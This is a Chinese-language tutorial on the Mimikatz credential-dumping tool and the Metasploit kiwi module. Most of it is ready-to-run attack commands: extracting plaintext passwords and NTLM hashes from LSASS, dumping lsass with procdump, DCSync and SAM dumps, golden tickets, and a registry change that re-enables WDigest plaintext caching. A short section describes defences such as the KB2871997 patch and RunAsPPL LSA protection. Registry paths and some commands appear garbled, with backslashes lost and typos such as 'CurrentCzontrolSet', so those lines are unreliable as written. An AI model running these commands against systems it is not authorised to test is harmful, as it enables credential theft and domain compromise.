项目地址:https://github.com/gentilkiwi/mimikatz/
一、工具简介Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。
注意: 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 二、Mimikatz命令 cls: 清屏standard: 标准模块,基本命令crypto: 加密相关模块sekurlsa: 与证书相关的模块kerberos: kerberos模块privilege: 提权相关模块process: 进程相关模块serivce: 服务相关模块lsadump: LsaDump模块ts: 终端服务器模块event: 事件模块misc: 杂项模块token: 令牌操作模块vault: Windows 、证书模块minesweeper:Mine Sweeper模块net:dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]busylight: BusyLight Modulesysenv: 系统环境值模块sid: 安全标识符模块iis: IIS XML配置模块rpc: mimikatz的RPC控制sr98: 用于SR98设备和T5577目标的RF模块rdm: RDM(830AL)器件的射频模块acr: ACR模块version: 查看版本exit: 退出**提升权限 命令:privilege::debug **
mimikatz许多功能都需要管理员权限,如果不是管理员权限不能debug
三、示例 抓取明文密码在windows2012以上的系统不能直接获取明文密码了,当可以搭配procdump+mimikatz获取密码。
mimikatz # logmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswords示例:windows server 2003
分析命令执行后的内容:
**msv:**这项是账户对应密码的各种加密协议的密文,可以看到有LM、NTLM和SHA1加密的密文 **tspkg,wdigest,kerberos:**这个就是账户对应的明文密码了。有的时候这三个对应的也不是全部都是一样的,需要看服务器是什么角色。 **SSP:**是最新登录到其他RDP终端的账户和密码
模块 sekurlsa模块 sekurlsa::logonpasswords抓取用户NTLM哈希sekurlsa::msv加载dmp文件,并导出其中的明文密码sekurlsa::minidump lsass.dmpsekurlsa::logonpasswords full导出lsass.exe进程中所有的票据sekurlsa::tickets /export kerberos模块 列出系统中的票据kerberos::listkerberos::tgt清除系统中的票据kerberos::purge导入票据到系统中kerberos::ptc 票据路径 lsadump模块 在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等lsadump::dcsync /domain:kevin.com /user:root(在域控上执行)读取所有域用户的哈希lsadump::lsa /patch从sam.hive和system.hive文件中获得NTLM Hashlsadump::sam /sam:sam.hive /system:system.hive从本地SAM文件中读取密码哈希token::elevatelsadump::sam wdigestWDigest协议是在WindowsXP中被引入的,旨在与HTTP协议一起用于身份认证。默认情况下,Microsoft在多个版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中启用了此协议,这意味着纯文本密码存储在LSASS(本地安全授权子系统服务)进程中。 Mimikatz可以与LSASS交互,允许攻击者通过以下命令检索这些凭据
mimikatz #privilege::debugmimikatz #sekurlsa::wdigest在windows2012系统以及以上的系统之后这个默认是关闭的如果在 win2008 之前的系统上打了 KB2871997 补丁,那么就可以去启用或者禁用 WDigest。Windows Server2012及以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。Windows Server2012以下版本,如果安装了KB2871997补丁,攻击者同样无法获取明文密码。配置如下键值:
HKEY_LOCAL_MACHINESystemCurrentControlSetControlSecurityProvidersWDigestUseLogonCredential 值设置为 0, WDigest 不把凭证缓存在内存;UseLogonCredential 值设置为 1, WDigest 就把凭证缓存在内存。 使用powershell进行更改
开启Wdigest AuthSet-ItemProperty -Path HKLM:SYSTEMCurrentCzontrolSetControlSecurityProvidersWDigest -Name UseLogonCredential -Type DWORD -Value 1关闭Wdigest AuthSet-ItemProperty -Path HKLM:SYSTEMCurrentCzontrolSetControlSecurityProvid LSA保护如何防止mimikatz获取一些加密的密文进行PTH攻击呢!其实微软推出的补丁KB2871997是专门针对PTH攻击的补丁,但是如果PID为500的话,还是可以进行PTH攻击的!本地安全权限服务(LSASS)验证用户是否进行本地和远程登录,并实施本地安全策略。 Windows 8.1及更高版本的系统中,Microsoft为LSA提供了额外的保护,以防止不受信任的进程读取内存或代码注入。Windows 8.1之前的系统,攻击者可以执行Mimikatz命令来与LSA交互并检索存储在LSA内存中的明文密码。
这条命令修改键的值为1,即使获取了debug权限吗,也不能直接获取明文密码和hash
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA /v RunAsPPL /t REG_DWORD /d 1 /f
获取高版本Windows系统的密码凭证使用procdump将lsass dump下来(需要管理员权限)
procdump.exe -accepteula -ma lsass.exe 1.dmp使用mimikatz读取密码
mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit msf中kiwi模块注:kiwi默认加载32位,如果目标系统位64位,将进程迁移到64位程序的进程中。
kiwi模块使用 load kiwi //加载kiwi模块help kiwi //查看帮助 kiwi模块命令 creds_all:列举所有凭据creds_kerberos:列举所有kerberos凭据creds_msv:列举所有msv凭据creds_ssp:列举所有ssp凭据creds_tspkg:列举所有tspkg凭据creds_wdigest:列举所有wdigest凭据dcsync:通过DCSync检索用户帐户信息dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RIDgolden_ticket_create:创建黄金票据kerberos_ticket_list:列举kerberos票据kerberos_ticket_purge:清除kerberos票据kerberos_ticket_use:使用kerberos票据kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令lsa_dump_sam:dump出lsa的SAMlsa_dump_secrets:dump出lsa的密文password_change:修改密码wifi_list:列出当前用户的wifi配置文件wifi_list_shared:列出共享wifi配置文件/编码 creds_all列举系统中的明文密码
kiwi_cmdkiwi_cmd可以使用mimikatz中的所有功能,命令需要接上mimikatz的命令
kikiwi_cmd sekurlsa::logonpasswords